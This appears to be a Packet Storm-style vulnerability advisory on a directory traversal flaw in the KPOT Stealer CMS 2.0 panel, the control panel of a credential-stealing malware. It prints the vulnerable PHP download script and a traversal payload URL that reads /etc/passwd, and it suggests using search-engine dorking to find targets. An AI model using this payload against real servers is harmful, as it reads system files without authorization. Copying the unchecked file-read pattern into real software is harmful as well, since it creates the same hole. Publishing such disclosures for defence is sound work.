Security
Headlines
HeadlinesLatestCVEs

Headline

KPOT Stealer CMS 2.0 Directory Traversal

KPOT Stealer CMS 2.0 suffers from a directory traversal vulnerability.

Packet Storm
#vulnerability#windows#google#git#php#auth#firefox
====================================================================================================================================| # Title     : KPOT Stealer CMS v2.0 Directory Traversal Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md                       |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] onfected file: download.php   <?php     if (isset($_GET['file']))     {     $file = $_GET['file'];     header('Content-Disposition: attachment; filename="'.basename($file).'"');     header('Content-Length: ' . filesize($file));     readfile($file);   }   ?>[+] use payload : download.php?file=../../../../../../../../../etc/passwd[+] http://127.0.0.1/KPOT/download.php?file=../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Packet Storm: Latest News

WordPress Really Simple Security Authentication Bypass